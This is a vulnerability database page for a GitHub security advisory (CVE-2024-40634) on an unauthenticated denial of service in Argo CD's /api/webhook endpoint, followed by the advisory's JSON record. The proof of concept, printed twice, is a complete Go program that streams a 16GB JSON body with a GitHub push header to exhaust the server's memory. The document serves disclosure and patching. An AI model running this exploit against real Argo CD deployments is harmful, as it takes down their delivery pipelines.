ghsa-jmvp-698c-4x3w
Vulnerability from github
Published
2024-07-22 17:20
Modified
2024-08-07 14:17
Summary
Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint
Details

Summary

This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.

Details

The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.

The fix would be to enforce a limit on the size of the request being parsed.

PoC

Port-forward to the argocd-server service, like so:

console kubectl port-forward svc/argocd-server -n argocd 8080:443

Run the below code:

```go package main

import ( "crypto/tls" "io" "net/http" )

// Define a custom io.Reader that generates a large dummy JSON payload. type DummyJSONReader struct { size int64 // Total size to generate read int64 // Bytes already generated }

// Read generates the next chunk of the dummy JSON payload. func (r *DummyJSONReader) Read(p []byte) (n int, err error) { if r.read >= r.size { return 0, io.EOF // Finished generating }

start := false
if r.read == 0 {
    // Start of JSON
    p[0] = '{'
    p[1] = '"'
    p[2] = 'd'
    p[3] = 'a'
    p[4] = 't'
    p[5] = 'a'
    p[6] = '"'
    p[7] = ':'
    p[8] = '"'
    n = 9
    start = true
}

for i := n; i < len(p); i++ {
    if r.read+int64(i)-int64(n)+1 == r.size-1 {
        // End of JSON
        p[i] = '"'
        p[i+1] = '}'
        r.read += int64(i) + 2 - int64(n)
        return i + 2 - n, nil
    } else {
        p[i] = 'x' // Dummy data
    }
}

r.read += int64(len(p)) - int64(n)
if start {
    return len(p), nil
}
return len(p) - n, nil

}

func main() { // Initialize the custom reader with the desired size (16GB in this case). payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB reader := &DummyJSONReader{size: payloadSize}

// HTTP client setup
httpClient := &http.Client{
    Timeout: 0, // No timeout
    Transport: &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    },
}

req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
if err != nil {
    panic(err)
}

// Set headers
req.Header.Set("Content-Type", "application/json")
req.Header.Set("X-GitHub-Event", "push")

resp, err := httpClient.Do(req)
if err != nil {
    panic(err)
}
defer resp.Body.Close()

println("Response status code:", resp.StatusCode)

} ```

Patches

A patch for this vulnerability has been released in the following Argo CD versions:

v2.11.6 v2.10.15 v2.9.20

For more information

If you have any questions or comments about this advisory:

Open an issue in the Argo CD issue tracker or discussions Join us on Slack in channel #argo-cd

Credits

This vulnerability was found & reported by Jakub Ciolek

The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "last_affected": "1.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.10.0"
            },
            {
              "fixed": "2.10.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/argoproj/argo-cd/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.11.0"
            },
            {
              "fixed": "2.11.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-40634"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-22T17:20:02Z",
    "nvd_published_at": "2024-07-22T18:15:03Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThis report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.\n\n### Details\nThe webhook server always listens to requests. By default, the endpoint doesn\u0027t require authentication. It\u0027s possible to send a large, malicious request with headers (in this case \"X-GitHub-Event: push\") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.\n\nThe fix would be to enforce a limit on the size of the request being parsed.\n\n### PoC\nPort-forward to the argocd-server service, like so:\n\n```console\nkubectl port-forward svc/argocd-server -n argocd 8080:443\n```\n\nRun the below code:\n\n```go\npackage main\n\nimport (\n\t\"crypto/tls\"\n\t\"io\"\n\t\"net/http\"\n)\n\n// Define a custom io.Reader that generates a large dummy JSON payload.\ntype DummyJSONReader struct {\n\tsize int64 // Total size to generate\n\tread int64 // Bytes already generated\n}\n\n// Read generates the next chunk of the dummy JSON payload.\nfunc (r *DummyJSONReader) Read(p []byte) (n int, err error) {\n\tif r.read \u003e= r.size {\n\t\treturn 0, io.EOF // Finished generating\n\t}\n\n\tstart := false\n\tif r.read == 0 {\n\t\t// Start of JSON\n\t\tp[0] = \u0027{\u0027\n\t\tp[1] = \u0027\"\u0027\n\t\tp[2] = \u0027d\u0027\n\t\tp[3] = \u0027a\u0027\n\t\tp[4] = \u0027t\u0027\n\t\tp[5] = \u0027a\u0027\n\t\tp[6] = \u0027\"\u0027\n\t\tp[7] = \u0027:\u0027\n\t\tp[8] = \u0027\"\u0027\n\t\tn = 9\n\t\tstart = true\n\t}\n\n\tfor i := n; i \u003c len(p); i++ {\n\t\tif r.read+int64(i)-int64(n)+1 == r.size-1 {\n\t\t\t// End of JSON\n\t\t\tp[i] = \u0027\"\u0027\n\t\t\tp[i+1] = \u0027}\u0027\n\t\t\tr.read += int64(i) + 2 - int64(n)\n\t\t\treturn i + 2 - n, nil\n\t\t} else {\n\t\t\tp[i] = \u0027x\u0027 // Dummy data\n\t\t}\n\t}\n\n\tr.read += int64(len(p)) - int64(n)\n\tif start {\n\t\treturn len(p), nil\n\t}\n\treturn len(p) - n, nil\n}\n\nfunc main() {\n\t// Initialize the custom reader with the desired size (16GB in this case).\n\tpayloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB\n\treader := \u0026DummyJSONReader{size: payloadSize}\n\n\t// HTTP client setup\n\thttpClient := \u0026http.Client{\n\t\tTimeout: 0, // No timeout\n\t\tTransport: \u0026http.Transport{\n\t\t\tTLSClientConfig: \u0026tls.Config{InsecureSkipVerify: true},\n\t\t},\n\t}\n\n\treq, err := http.NewRequest(\"POST\", \"https://localhost:8080/api/webhook\", reader)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// Set headers\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-GitHub-Event\", \"push\")\n\n\tresp, err := httpClient.Do(req)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tprintln(\"Response status code:\", resp.StatusCode)\n}\n```\n\n### Patches\nA patch for this vulnerability has been released in the following Argo CD versions:\n\nv2.11.6\nv2.10.15\nv2.9.20\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\nJoin us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\nThis vulnerability was found \u0026 reported by Jakub Ciolek\n\nThe Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue\n",
  "id": "GHSA-jmvp-698c-4x3w",
  "modified": "2024-08-07T14:17:41Z",
  "published": "2024-07-22T17:20:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/commit/46c0c0b64deaab1ece70cb701030b76668ad0cdc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/commit/540e3a57b90eb3655db54793332fac86bcc38b36"
    },
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/commit/d881ee78949e23160a0b280bb159e4d3d625a4df"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-cd"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2024-3002"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Argo CD Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.